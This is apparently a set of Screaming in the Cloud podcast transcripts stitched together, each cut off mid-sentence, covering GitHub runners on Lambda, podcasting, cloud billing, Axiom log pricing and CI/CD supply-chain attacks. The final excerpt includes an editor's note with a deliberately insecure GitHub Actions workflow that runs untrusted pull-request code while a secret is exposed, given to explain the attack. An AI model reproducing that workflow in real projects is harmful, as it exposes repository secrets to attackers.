It’s not anymore because I’m not paying $42,000 a month in API costs to some jackass, but it still exists in the form of if you want to create threads on Mastodon. But after I put this out, some people complained that it was slow.To which my response was, “What do you mean? It’s super fast for me in San Francisco talking to it hosted in Oregon.” But on every round trip from halfway around the world, it became a problem. So, I got it into my head that since this thing was fully stateless, other than a Lambda function being fronted via an API Gateway, that I should deploy it to every region. It didn’t quite fit into a Cloudflare Worker or into one of the Edge Lambda functions that AWS has given up on, but okay, how do I deploy something to every region?And the answer is, with great difficulty because it’s clear that no one ever imagined, with all those regions, that anyone would use all of them. It’s imagined that most customers use two or three, but customers are different, so which two or three is going to vary widely. So, anything halfway sensible about doing deployments like this didn’t work out. Again, because this thing was also a Lambda function and an API Gateway, it was dirt cheap, so I didn’t really want to start spending stupid amounts of money doing deployment infrastructure and the rest.So okay, how do I do this? Well, GitHub Actions is awesome. It is basically what all of AWS’s code offerings wish that they were. CodeBuild is sad and this was kind of great. The problem is, once you’re out of the free tier, and if you’re a bad developer where you do a deploy on every iteration, suddenly it starts costing for what I was doing in every region, something like a quarter per deploy, which adds up when you’re really, really bad at programming.Amir: [laugh].Corey: So, their matrix jobs are awesome, but I wanted to do some self-hosted runners. How do I do that?
And I want to keep it cheap, so how do I do a self-hosted runner inside of a Lambda function? Which led me directly to you. And it was nothing short of astonishing. This was a few years ago. I seem to recall that it used to be a bit less well-architected in terms of its elegance. Did it always use Step Functions, for example, to wind up orchestrating these things?Amir: Yeah, so I do remember that day. We met pretty much… basically as a joke because the Lambda Runner was a joke that I did, and I posted on Twitter, and I was half-proud of my joke that starts in ten seconds, right? But yeah, no, the—I think it always used Step Functions. I’ve been kind of in love with Step Functions for the past two years. They just—they’re nice.Corey: Oh, they’re magic, and AWS is so bad at telling their story. Both of those things are true.Amir: Yeah. And the API is not amazing. But like, when you get it working—and you know, you have to spend some time to get it working—it’s really nice because then you have nothing to manage, ever. And they can call APIs directly now, so you don’t have to even create Lambdas. It’s pretty cool.Corey: And what I loved is you wind up deploying this thing to whatever account you want it to live within. What is it, the OIDC? I always get those letters in the wrong direction. OIDC, I think, is correct.Amir: I think it’s OIDC, yeah.Corey: Yeah, and it winds up doing this through a secure method as opposed to just okay, now anyone with access to the project can deploy into your account, which is not ideal. And it just works. It spins up a whole bunch of these Lambda functions that are using a Docker image as the deployment environment. And yeah, all right, if effectively my CDK deploy—which is what it’s doing inside of this thing—doesn’t complete within 15 minutes, then it’s not going to and the thing is going to break out. We’ve solved the halting problem. After 15 minutes, the loop will terminate.
The end.But that’s never been a problem, even with getting ACM certificates spun up. It completes well within that time limit. And its cost to me is effectively nothing. With one key exception: that you made the choice to use Secrets Manager to wind up storing a lot of the things it cares about instead of Parameter Store, so I think you wind up costing me—I think there’s two of th
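The 15-minute cap Corey jokes about—“we’ve solved the halting problem”—is just a bounded wait: poll until the work finishes or a deadline passes, then give up. Here is a minimal sketch of that pattern; the function name and injectable clock are inventions for illustration, and the real project leans on Step Functions and Lambda’s own timeout rather than a loop like this:

```python
import time

def wait_for(check, timeout_s=15 * 60, interval_s=1,
             clock=time.monotonic, sleep=time.sleep):
    """Poll check() until it returns True or timeout_s elapses.
    clock and sleep are injectable so the loop can be tested without
    actually waiting 15 minutes."""
    deadline = clock() + timeout_s
    while clock() < deadline:
        if check():
            return True
        sleep(interval_s)
    return False  # the loop always terminates -- "halting problem solved"
```

With a fake clock that advances on every `sleep`, the behavior is easy to verify: the loop returns `True` as soon as the check passes and `False` once the deadline is exhausted.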
Chris Hill, owner of HumblePod and host of the We Built This Brand podcast, joins Corey on Screaming in the Cloud to discuss the future of podcasting and the role emerging technologies will play in the podcasting space. Chris describes why AI is struggling to make a big impact in the world of podcasting, and also emphasizes the importance of authenticity and finding a niche when producing a show. Corey and Chris discuss where video podcasting works and where it doesn’t, and why it’s more important to focus on the content of your podcast than the technical specs of your gear. Chris also shares insight on how to gauge the health of your podcast audience with his Podcast Listener Lifecycle evaluation tool.About ChrisChris Hill is a Knoxville, TN native and owner of the podcast production company, HumblePod. He helps his customers create, develop, and produce podcasts and is working with clients in Knoxville as well as startups and entrepreneurs across the United States, Silicon Valley, and the world.In addition to producing podcasts for nationally-recognized thought leaders, Chris is the co-host and producer of the award-winning Our Humble Beer Podcast and the host of the newly-launched We Built This Brand podcast. He also lectures at the University of Tennessee, where he leads non-credit courses on podcasts and marketing.  He received his undergraduate degree in business at the University of Tennessee at Chattanooga where he majored in Marketing & Entrepreneurship, and he later received his MBA from King University.Chris currently serves his community as the President of the American Marketing Association in Knoxville. 
In his spare time, he enjoys hanging out with the local craft beer community, international travel, exploring the great outdoors, and his many creative pursuits.Links Referenced: HumblePod: HumblePod Quick Edit: Podcast Listener Lifecycle: Twitter: Transcript:Announcer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.Corey: Are you navigating the complex web of API management, microservices, and Kubernetes in your organization? is here to be your guide to connectivity in the cloud-native universe!, the powerhouse behind Istio, is revolutionizing cloud-native application networking. They brought you Gloo Gateway, the lightweight and ultra-fast gateway built for modern API management, and Gloo Mesh Core, a necessary step to secure, support, and operate your Istio environment.Why struggle with the nuts and bolts of infrastructure when you can focus on what truly matters - your application.’s got your back with networking for applications, not infrastructure. Embrace zero trust security, GitOps automation, and seamless multi-cloud networking. And here’s the real game-changer: a common interface for every connection, in every direction, all with one API. It’s the future of connectivity, and it’s called Gloo. DevOps and Platform Engineers, your journey to a seamless cloud-native experience starts here. Visit today and level up your networking game.Corey: Welcome to Screaming in the Cloud. I’m Corey Quinn. My returning guest probably knows more about this podcast than I do.
Chris Hill is not only the CEO of HumblePod, but he’s also the producer of a lot of my various media endeavors, ranging from the psychotic music videos that I wind up putting out to mock executives on their birthdays to more normal videos that I wind up recording when I’m forced into the studio and can’t escape because they bar the back exits, to this show. Chris, thank you for joining me, it’s nice to see you step into the light.Chris: It’s a pleasure to be here, Corey.Corey: So, you have been, effectively, producing this entire podcast after I migrated off of a previous vendor, what four years ago? Five?Chris: About four or five years ago now, yeah. It’s been a while.Corey: Time is a flat circle. It’s hard to keep track of all of that. But it’s weird that you and I don’t get to talk nearly as much as we used to, just because, frankly, the process is working and therefore, you disappear into the background.Chris: Yeah.Corey: One of the dangerous parts of that is that the only time I ever wind up talking to you is when something has gone wrong somewhere and frankly, that does not happen anymore. Which means we don’t talk.Chris: Yeah. And I’m okay with that. I’m just kidding. I love talking to you, Corey.Corey: Oh, I tolerate you. And every once in a while, you irritate me massively, which is why I’m punishing you this year by—Chris: [laugh].Corey: Making you tag along for re:Invent.Chris: I’m really excited about that one. It’s going to be fun to be there with you and Jeremy and Mike and everybody. Looking forward to it.Corey: You know how I can tell that you’ve never been to re:Invent before?Chris: “I’m looking forward to it.”Corey: Exactly. You still have life in your eyes and a spark in your step. And yeah… that’ll change. That’ll change. So, a lot of this show is indirectly your fault because this is a weird thing for a podcaster to admit, but I genuinely don’t listen to podcasts. 
I did when I was younger, back when I had what the kids today call ‘commute’ or ‘RTO’ as they start slipping into the office, but I started working from home almost a decade ago, and there aren’t too many podcasts that fit into the walk from the kitchen to my home office. Like great, give me everything you want me to know in about three-and-a-half seconds. Go… and we’re done. It doesn’t work. So, I’m a producer, but I don’t consume my own content, which I think generally is something you only otherwise see in, you know, drug dealers.Chris: Yeah. Well, and I mean, I think a lot of professional media, like, you get to a point where you’re so busy and you’re creating so much content that it’s hard to sit down and review your own stuff. I mean, even at HumblePod, I’m in a place where we’re producing our own show now called We Built This Brand, and I end up in a place where some weeks I’m like, “I can’t review this. I approve it. You send it out, I trust you.” So, Corey, I’m starting to echo you in a lot of ways and it’s just—it makes me laugh from time to time.Corey: Somewhat recently, I wound up yet again, having to do a check on, “Hey, you use HumblePod for your podcasting work. Do you like them?” And it’s fun. It’s almost like when someone reaches out about someone you used to work with. Like, “We’re debating hiring this person. Should we?” And I love being able to give the default response for the people I’ve worked with for this long, which is, “Shut up and hire them. Why are you talking to me and not hiring them faster? Get on with it.”Because I’m a difficult customer. I know that. The expectations I have are at times unreasonably high. And the fact that I don’t talk to you nearly as much as I used to shows that this all has been working. Because there was a time we talked multiple times a day back—Chris: Mm-hm.Corey: When I had no idea what I was doing. 
Now, 500-some-odd episodes in, I still have no idea what I’m doing, but by God, I’ve gotten it down to a science.Chris: Absolutely you have. And you know, technically we’re over 1000 episodes together, I think, at this point because if you combine what you’re doing with Screaming in the Cloud, with Last Week in AWS slash AWS Morning Brief, yeah, we’ve done a lot with you. But yes, you’ve come a long way.Corey: Yes, I have become the very whitest of guys. It works out well. It’s like, one podcast isn’t enough. We’re going to have two of them. But it’s easy to talk about the past. Let’s talk instead about the future a little bit. What does the future of podcasting look like? I mean, one easy direction to go in with this, as you just mentioned, there’s over 1000 episodes of me flapping my gums in the breeze. That feels like it’s more than enough data to train an AI model to basically be me without all the hard work, but somehow I kind of don’t see it happening anytime soon.Chris: Yeah, I think listeners still value authenticity a lot and I think that’s one of the hard things you’re seeing in podcasting as a whole is that these organizations come in and they’re like, “We’re going to be the new podcast killer,” or, “We’re going to be the next thing for podcasting,” and if it’s too overproduced, too polished, like, I think people can detect that and see that inauthenticity, which is why, like, AI coming in and taking over people’s voices is so crazy. One of the things that’s happening right now at Spotify is that they are beta testing translation software so that Screaming in the Cloud could automatically be in Spanish or Last Week in AWS could automatically be in French or what have you. It’s just so surreal to me that they’re doing this, but they’re doing exactly what you said. It’s large language models that understand what the host is saying and then they’re translating it into another language.The problem is, what if that automation gets that word wrong?
You know how bad one wrong word could be, translating into Spanish or French or any other language from English. So, there’s a lot of challenges to be met there. And then, of course, you know, once they’ve got your voice, what do they do with it? There’s a lot of risk there.Corey: The puns don’t translate very well, most of the time, either.Chris: Oh, yes.Corey: Especially when I intentionally mispronounce words like Ku-BER-netees.Chris: Exactly. I mean, it’s going to be
John Wynkoop, Cloud Economist & Platypus Herder at The Duckbill Group, joins Corey on Screaming in the Cloud to discuss why he decided to make a career move and become an AWS billing consultant. Corey and John discuss how once you’re deeply familiar with one cloud provider, those skills become transferable to other cloud providers as well. John also shares the trends he has seen post-pandemic in the world of cloud, including the increased adoption of a multi-cloud strategy and the need for costs control even for VC-funded start-ups. About JohnWith over 25 years in IT, John’s done almost every job in the industry, from running cable and answering helpdesk calls to leading engineering teams and advising the C-suite. Before joining The Duckbill Group, he worked across multiple industries including private sector, higher education, and national defense. Most recently he helped IGNW, an industry leading systems integration partner, get acquired by industry powerhouse CDW. When he’s not helping customers spend smarter on their cloud bill, you can find him enjoying time with his family in the beautiful Smoky Mountains near his home in Knoxville, TN.Links Referenced: The Duckbill Group: LinkedIn: TranscriptAnnouncer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.Corey: Welcome to Screaming in the Cloud. I’m Corey Quinn. And the times, they are changing. My guest today is John Wynkoop. John, how are you?John: Hey, Corey, I’m doing great. Thanks for having me.Corey: So, big changes are afoot for you. You’ve taken a new job recently. What are you doing now?John: Well [laugh], so I’m happy to say I have joined The Duckbill Group as a cloud economist. 
So, came out of the big company world, and have dived back in—or dove back into the startup world.Corey: It’s interesting because when we talk to those big companies, they always identify us as oh, you’re a startup, which is hilarious on some level because our AWS account hangs out in AWS’s startup group, but if you look at the spend being remarkably level from month to month to month to year to year to year, they almost certainly view us as they’re a startup, but they suck at it. They completely failed. And so much of the email stuff that you get from them presupposes that you’re venture-backed, that you’re trying to conquer the entire world. We don’t do that here. We have this old-timey business model that our forebears would have understood of, we make more money than we spend every month and we continue that trend for a long time. So first, thanks for joining us, both on the show and at the company. We like having you around.John: Well, thanks. And yeah, I guess that’s—maybe a startup isn’t the right word to describe what we do here at The Duckbill Group, but as you said, it seems to fit into the industry classification. But that was one of the things I actually really liked about the—that was appealing about joining the team was, we do spend less than we make and we’re not after hyper-growth and we’re not trying to consume everything.Corey: So, it’s interesting when you put a job description out into the world and you see who applies—and let’s be clear, for those who are unaware, job descriptions are inherently aspirational shopping lists. If you look at a job description and you check every box on the thing and you’ve done all the things they want, the odds are terrific you’re going to be bored out of your mind when you wind up showing up to do these… whatever that job is. You should be learning stuff and growing. At least that’s always been my philosophy to it.
One of the interesting things about you is that you checked an awful lot of boxes, but there is one that I think would cause people to raise an eyebrow, which is, you’re relatively new to the fun world of AWS.John: Yeah. So, obviously I, you know, have been around the block a few times when it comes to cloud. I’ve used AWS, built some things in AWS, but I wouldn’t have classified myself as an AWS guru by any stretch of the imagination. I spent the last probably three years working in Google Cloud, helping customers build and deploy solutions there, but I do at least understand the fundamentals of cloud, and more importantly—at least for our customers—cloud costs because at the end of the day, they’re not all that different.Corey: I do want to call out that you have a certain humility to you which I find endearing. But you’re not allowed to do that here; I will sing your praises for you. Before they deprecated it like they do almost everything else, you were one of the relatively few Google Cloud Certified Fellows, which was sort of like their Heroes program only, you know, they killed it in favor of something else like there’s a Champion program or whatnot. You are very deep in the world of both Kubernetes and Google Cloud.John: Yeah. So, there was a few of us that were invited to come out and help Google pilot that program in, I believe it was 2019, and give feedback to help them build the Cloud Fellows Program. And thankfully, I was selected based on some of our early experience with Anthos, and specifically, it was around Certified Fellow in what they call hybrid multi-cloud, so it was experience around Anthos. Or at the time, they hadn’t called it Anthos; they were calling it CSP or Cloud Services Platform because that’s not an overloaded acronym. 
So yeah, definitely, was very humbled to be part of that early on.I think the program, as you said, grew to about 70 or so, maybe 100 certified individuals before they transitioned—not killed—transitioned that program into the Cloud Champions program. So, those folks are all still around, myself included. They’ve just now changed the moniker. But we all get to use the old title still as well, so that’s kind of cool.Corey: I have to ask, what would possess you to go from being one of the best in the world at using Google Cloud over here to our corner of the AWS universe? Because the inverse, if I were to somehow get ejected from here—which would be a neat trick, but I’m sure it’s theoretically possible—like, “What am I going to do now?” I would almost certainly wind up doing something in the AWS ecosystem, just due to inertia, if nothing else. You clearly didn’t see things quite that way. Why make the switch?John: Well, a couple of different reasons. So, being at a Google partner presents a lot of challenges and one of the things that was supremely interesting about coming to Duckbill is that we’re independent. So, we’re not an AWS partner. We are an independent company that is beholden only to our customers. And there isn’t anything like that in the Google ecosystem today.There’s, you know, there’s Google partners and then there’s Google customers and then there’s Google. So, that was part of the appeal. And the other thing was, I enjoy learning new things, and honestly, learning, you know, into the depths of AWS cost hell is interesting. There’s a lot to learn there and there’s a lot of things that we can extract and use to help customers spend less. So, that to me was super interesting.And then also, I want to help build an organization.
So, you know, I think what we’re doing here at The Duckbill Group is cool and I think that there’s an opportunity to grow our services portfolio, and so I’m excited to work with the leadership team to see what else we can bring to market that’s going to help our customers, you know, not just with cost optimization, not just with contract negotiation, but you know, through the lifecycle of their AWS… journey, I guess we’ll call it.Corey: It’s one of those things where I always have believed, on some level, that once you’re deep in a particular cloud provider, if there’s reason for it, you can re-skill relatively quickly to a different provider. There are nuances—deep nuances—that differ from provider to provider, but the underlying concepts generally all work the same way. There’s only so many ways you can have data go from point A to point B. There’s only so many ways to spin up a bunch of VMs and whatnot. And you’re proof-positive that theory was correct.You’d been here less than a week before I started learning nuances about AWS billing from you. I think it was something to do with the way that late fees are assessed when companies don’t pay Amazon as quickly as Amazon desires. So, we’re all learning new things constantly and no one stuffs this stuff all into their head. But that, if nothing else, definitely cemented that yeah, we’ve got the right person in the seat.John: Yeah, well, thanks. And certainly, the deeper you go on a specific cloud provider, things become fresh in your memory, you know, others cached, so to speak. So, coming up to speed on AWS has been a little bit more documentation reading than it would have been, if I were, say, jumping right into a GCP engagement. But as you said, at the end of the day, there’s a lot of similarities. Obviously understanding the nuances of, for example, account organization versus, you know, GCP’s Project and Folders.
Well, that’s a substantial difference and so there’s a lot of learning that has to happen.Thankfully, you know, all these companies, maybe with the exception of Oracle, have done a really good job of documenting all of the concepts in their publicly available documentation. And then obviously, having a team of experts here at The Duckbill Group to ask stupid questions of doesn’t hurt. But definitely, it’s not as hard to come up to speed as one may think, once you’ve got it understood in one provider.Corey: I took a look recently and was kind of surprised to discover that I’ve been doin
Seif Lotfy, Co-Founder and CTO at Axiom, joins Corey on Screaming in the Cloud to discuss how and why Axiom has taken a low-cost approach to event data. Seif describes the events that led to him helping co-found a company, and explains why the team wrote all their code from scratch. Corey and Seif discuss their views on AWS pricing, and Seif shares his views on why AWS doesn’t have to compete on price. Seif also reveals some of the exciting new products and features that Axiom is currently working on. About SeifSeif is the bubbly Co-founder and CTO of Axiom where he has helped build the next generation of logging, tracing, and metrics. His background is at Xamarin and Deutsche Telekom, and he is the kind of deep technical nerd that geeks out on white papers about emerging technology and then goes to see what he can build.Links Referenced: Axiom: Twitter: TranscriptAnnouncer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.Corey: Welcome to Screaming in the Cloud. I’m Corey Quinn. This promoted guest episode is brought to us by my friends, and soon to be yours, over at Axiom. Today I’m talking with Seif Lotfy, who’s the co-founder and CTO of Axiom. Seif, how are you?Seif: Hey, Corey, I am very good, thank you. It’s pretty late here, but it’s worth it. I’m excited to be on this interview. How are you today?Corey: I’m not dead yet. It’s weird, I see you at a bunch of different conferences, and I keep forgetting that you do in fact live half a world away. Is the entire company based in Europe? And where are you folks? Where do you start and where do you stop geographically? Let’s start there. We over—everyone dives right into product. No, no, no.
I want to know where in the world people sit because apparently, that’s the most important thing about a company in 2023.Seif: Unless you ask Zoom because they’re undoing whatever they did. We’re from New Zealand, all the way to San Francisco, and everything in between. So, we have people in Egypt and Nigeria, all around Europe, all around the US… and UK, if you don’t consider it Europe anymore.Corey: Yeah, it really depends. There’s a lot of unfortunate naming that needs to get changed in the wake of that.Seif: [laugh].Corey: But enough about geopolitics. Let’s talk about industry politics. I’ve been a fan of Axiom for a while and I was somewhat surprised to realize how long it had been around because I only heard about you folks a couple of years back. What is it you folks do? Because I know how I think about what you’re up to, but you’ve also gone through some messaging iteration, and it is a near certainty that I am behind the times.Seif: Well, at this point, we just define ourselves as the best home for event data. So, Axiom is the best home for event data. We try to deal with everything that is event-based, so time-series. So, we can talk metrics, logs, traces, et cetera. And right now predominantly serving engineering and security.And we’re trying to be—or we are—the first cloud-native time-series platform to provide streaming search, reporting, and monitoring capabilities. And we’re built from the ground up, by the way. Like, we didn’t actually—we’re not using Parquet [unintelligible 00:02:36] thing. We’re completely everything from the ground up.Corey: When I first started talking to you folks a few years back, there were two points to me that really stood out, and I know at least one of them still holds true. The first is that at the time, you were primarily talking about log data. Just send all your logs over to Axiom. The end. 
And that was a simple message that was simple enough that I could understand it, frankly.Because back when I was slinging servers around and you know breaking half of them, logs were effectively how we kept track of what was going on, where. These days, it feels like everything has been repainted with a very broad brush called observability, and the takeaway from most company pitches has been, you must be smarter than you are to understand what it is that we’re up to. And in some cases, you scratch below the surface and realize it no, they have no idea what they’re talking about either and they’re really hoping you don’t call them on that.Seif: It’s packaging.Corey: Yeah. It is packaging and that’s important.Seif: It’s literally packaging. If you look at it, traces and logs, these are events. There's a timestamp and just data with it. It’s a timestamp and data with it, right? Even metrics is all the way to that point.And a good example, now everybody’s jumping on [OTel 00:03:46]. For me, OTel is nothing else, but a different structure for time series, for different types of time series, and that can be used differently, right? Or at least not used differently but you can leverage it differently.Corey: And the other thing that you did that was interesting and is a lot, I think, more sustainable as far as [moats 00:04:04] go, rather than things that can be changed on a billboard or whatnot, is your economic position. And your pricing has changed around somewhat, but I ran a number of analyses on your cost that you were passing on to customers and my takeaway was that it was a little bit more expensive to store data for logs in Axiom than it was to store it in S3, but not by much. And it just blew away the price point of everything else focused around logs, including AWS; you’re paying 50 cents a gigabyte to ingest CloudWatch logs data over there. 
Other companies are charging multiples of that and Cisco recently bought Splunk for $28 billion because it was cheaper than paying their annual Splunk bill. How did you get to that price point? Is it just a matter of everyone else being greedy or have you done something different?Seif: We looked at it from the perspective of… so there’s the three L’s of logging. I forgot the name of the person at Netflix who talked about that, but basically, it’s low costs, low latency, large scale, right? And you will never be able to fulfill all three of them. And we decided to work on low costs and large scale. And in terms of low latency, we won’t be as low as others like ClickHouse, but we are low enough. Like, we’re fast enough.The idea is to be fast enough because in most cases, I don’t want to compete on milliseconds. I think if the user can see his data in two seconds, he’s happy. Or three seconds, he’s happy. I’m not going to be, like, one to two seconds and make the cost exponentially higher because I’m one second faster than the other. And that’s, I think, the way we approached this from day one.And from day one, we also started utilizing the idea of existence of Open—Object Storage, we have our own compressions, our own encodings, et cetera, from day one, too, and we still stick to that. That’s why we never converted to other existing things like Parquet. Also because we are Schema-On-Read, which Parquet doesn’t allow you really to do. But other than that, it’s… from day one, we wanted to save costs by also making coordination free.
So, ingest has to be coordination free, right, because then we don’t run a shitty Kafka, like, honestly a lot—a lot of the [logs 00:06:19] companies who are running a Kafka in front of it, the Kafka tax reflects in the bill that you’re paying them.Corey: What I found fun about your pricing model is it gets to a point that for any reasonable workload, how much to log or what to log or sample or keep everything is no longer an investment decision; it’s just go ahead and handle it. And that was originally what you wound up building out. Increasingly, it seems like you’re not just the place to send all the logs to, which to be honest, I was excited enough about that. That was replacing one of the projects I did a couple of times myself, which is building highly available, fault-tolerant, rsyslog clusters in data centers. Okay, great, you’ve gotten that unlocked, the economics are great, I don’t have to worry about that anymore.And then you started adding interesting things on top of it, analyzing things, replaying events that happen to other players, et cetera, et cetera, it almost feels like you’re not just a storage depot, but you also can forward certain things on under a variety of different rules or guises and format them as whatever on the other side is expecting them to be. So, there’s a story about integrating with other observability vendors, for example, and only sending the stuff that’s germane and relevant to them since everyone loves to charge by ingest.
This allows us to see, like, how—allows customers to see how we compare to others, but then we took it a bit further and now, it’s still in closed invite-only, but we have Pipelines—codenamed Pipelines—which allows you to send data to us and we will keep it as a source of truth, then, given specific rules, we can ship it anywhere to a different destination, right, and this allows you just to, on the fly, send specific filtered things out to, I don’t know, a different vendor or even to S3 or you could send it to Splunk. But at the same time, you can—because we have all your data, you can go back in the past, if an incident happens, and replay that completely into a different product.Corey: I would say that there’s a definite approach to observability, from the perspective of every company ten
Adnan Khan, Lead Security Engineer at Praetorian, joins Corey on Screaming in the Cloud to discuss software bill of materials and supply chain attacks. Adnan describes how simple pull requests can lead to major security breaches, and how to best avoid those vulnerabilities. Adnan and Corey also discuss the rapid innovation at GitHub Actions, and the pros and cons of having new features added so quickly when it comes to security. Adnan also discusses his view on the state of AI and its impact on cloud security. About AdnanAdnan is a Lead Security Engineer at Praetorian. He is responsible for executing on Red-Team Engagements as well as developing novel attack tooling in order to meet and exceed engagement objectives and provide maximum value for clients.His past experience as a software engineer gives him a deep understanding of where developers are likely to make mistakes, and he has applied this knowledge to become an expert in attacks on organizations’ CI/CD systems.Links Referenced: Praetorian: Twitter: Praetorian blog posts: TranscriptAnnouncer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.Corey: Are you navigating the complex web of API management, microservices, and Kubernetes in your organization? is here to be your guide to connectivity in the cloud-native universe!, the powerhouse behind Istio, is revolutionizing cloud-native application networking.
They brought you Gloo Gateway, the lightweight and ultra-fast gateway built for modern API management, and Gloo Mesh Core, a necessary step to secure, support, and operate your Istio environment.Why struggle with the nuts and bolts of infrastructure when you can focus on what truly matters - your application?’s got your back with networking for applications, not infrastructure. Embrace zero trust security, GitOps automation, and seamless multi-cloud networking, all with And here’s the real game-changer: a common interface for every connection, in every direction, all with one API. It’s the future of connectivity, and it’s called Gloo by Developers and Platform Engineers, your journey to a seamless cloud-native experience starts here. Visit today and level up your networking game.Corey: As hybrid cloud computing becomes more pervasive, IT organizations need an automation platform that spans networks, clouds, and services—while helping deliver on key business objectives. Red Hat Ansible Automation Platform provides smart, scalable, sharable automation that can take you from zero to automation in minutes. Find it in the AWS Marketplace.Corey: Welcome to Screaming in the Cloud, I’m Corey Quinn. I’ve been studiously ignoring a number of buzzword, hype-y topics, and it’s probably time that I addressed some of them. One that I’ve been largely ignoring, mostly because of its prevalence at Expo Hall booths at RSA and other places, has been software bill of materials and supply chain attacks. Finally, I figured I would indulge the topic. Today I’m speaking with Adnan Khan, lead security engineer at Praetorian. Adnan, thank you for joining me.Adnan: Thank you so much for having me.Corey: So, I’m trying to understand, on some level, where the idea of these SBOM or bill-of-material attacks have—where they start and where they stop. I’ve seen it as far as upstream dependencies have a vulnerability. Great.
I’ve seen misconfigurations in how companies wind up configuring their open-source presences. There have been a bunch of different, it feels almost like orthogonal concepts to my mind, lumped together as this is a big scary thing because if we have a big single scary thing we can point at, that unlocks budget. Am I being overly cynical on this or is there more to it?Adnan: I’d say there’s a lot more to it. And there’s a couple of components here. So first, you have the SBOM-type approach to security where organizations are looking at which packages are incorporated into their builds. And vulnerabilities can come out in a number of ways. So, you could have software actually have bugs or you could have malicious actors actually insert backdoors into software.I want to talk more about that second point. How do malicious actors actually insert backdoors? Sometimes it’s compromising a developer. Sometimes it’s compromising credentials to push packages to a repository, but other times, it could be as simple as just making a pull request on GitHub. And that’s somewhere where I’ve spent a bit of time doing research, building off of techniques that other people have documented, and also trying out some attacks for myself against two Microsoft repositories and several others that I’ve reported over the last few months that would have been able to allow an attacker to slip a backdoor into code and expand the number of projects that they are able to attack beyond that.
Most of my experience with client-side Git configuration in the .git repository—pre-commit hooks being a great example—is that hooks, intentionally and by design from a security perspective, do not convey when you check that code in and push it somewhere, or grab someone else’s, which is probably for the best because otherwise, it’s, “Oh yeah, just go ahead and copy your password hash file and email that to something else via a series of arcane shell script stuff.” The vector is there. I was unpleasantly surprised somewhat recently to discover that when I cloned a public project and started running it locally and then adding it to my own fork, that it would attempt to invoke a whole bunch of GitHub Actions flows that I’d never, you know, allowed it to do. That was… let’s say, eye-opening.Adnan: [laugh]. Yeah. So, on the particular topic of GitHub Actions, the pull request as an attack vector, like, there’s a lot of different forms that an attack can take. So, one of the more common ones—and this is something that’s been around for just about as long as GitHub Actions has been around—is a certain trigger called ‘pull request target.’ What this means is that when someone makes a pull request against the base repository, maybe a branch within the base repository such as main, that will be the workflow trigger.And from a security perspective, when it runs on that trigger, it does not require approval at all. And that’s something that a lot of people don’t really realize when they’re configuring their workflows.
Because normally, when you have a pull request trigger, the maintainer can check a box that says, “Oh, require approval for all external pull requests.” And they think, “Great, everything needs to be approved.” If someone tries to add malicious code to run on the pull request target trigger, then they can look at the code before it runs and they’re fine.But in a pull request target trigger, there is no approval and there’s no way to require an approval, except for configuring the workflow securely. So, in this case, what happens is, and in one particular case against the Microsoft repository, this was a Microsoft reusable GitHub Action called GPT Review. It was vulnerable because it checked out code from my branch—so if I made a pull request, it checked out code from my branch, and you could find this by looking at the workflow—and then it ran tests on my branch, so it’s running my code. So, by modifying the entry points, I could run code that runs in the context of that base branch and steal secrets from it, and use those to perform malicious Actions.Corey: Got you. It feels like historically, one of the big threat models around things like this—al—[and when 00:06:02] you have any sort of CI/CD exploit—is that it falls down one of two branches: it’s either getting secret access so you can leverage those credentials to pivot into other things—I’ve seen a lot of that in the AWS space—or more boringly, and more commonly in many cases, it seems to be oh, how do I get it to run this crypto miner nonsense thing. With the somewhat large-scale collapse of crypto across the board, it’s been convenient to see that be less prevalent, but still there. Just because you’re not making as much money means that you’ll still just have to do more of it when it’s all in someone else’s account. So, I guess it’s easier to see and detect a lot of the exploits that require a whole bunch of compute power.
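[Editor’s note: the insecure shape Adnan describes can be sketched in a few lines of workflow YAML. This is an illustrative reconstruction, not the actual GPT Review workflow; the workflow name, script name, and secret name are hypothetical.]

```yaml
# Hypothetical workflow showing the insecure pull_request_target pattern.
name: pr-tests

# pull_request_target fires on pull requests but runs in the context of the
# *base* repository, with its secrets available and no approval gate applied.
on: pull_request_target

jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          # Danger: checks out the untrusted fork's head commit...
          ref: ${{ github.event.pull_request.head.sha }}
      # ...and then executes it while the base repo's secrets are in scope.
      - name: Run tests
        run: ./run-tests.sh
        env:
          OPENAI_API_KEY: ${{ secrets.OPENAI_API_KEY }}
```

A fork can modify run-tests.sh (or anything it calls) in its own branch, open a pull request, and have that code run with the secret exposed, with no approval required. Using the plain pull_request trigger, or never checking out and executing the PR head under pull_request_target, avoids this.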
The, oh by the way, we stole your secrets and now we’re going to use that to lateral into an organization seem like it’s something far more… I guess, dangerous and also sneaky.Adnan: Yeah, absolutely. And you hit the nail on the head there with sneaky because when I first demonstrated this, I made a test account, I created a PR, I made a couple of Actions such as I modified the name of the release for the repository, I just put a little tag on it, and didn’t do any other changes. And then I also created a feature branch in one of Microsoft’s repositories. I don’t have permission to do that. That just sat there for about almost two weeks and then someone else exploited it and then they responded to it.So, sneaky is exactly the word you could describe something like this. And another reason why it’s concerning is, beyond the secret disclosure for—and in this case, the repository only had an OpenAI API key, so… okay, you can talk to ChatGPT for free. But this was itself a Github Action and it was used by another Microsoft machine-learning project that had a lot mo
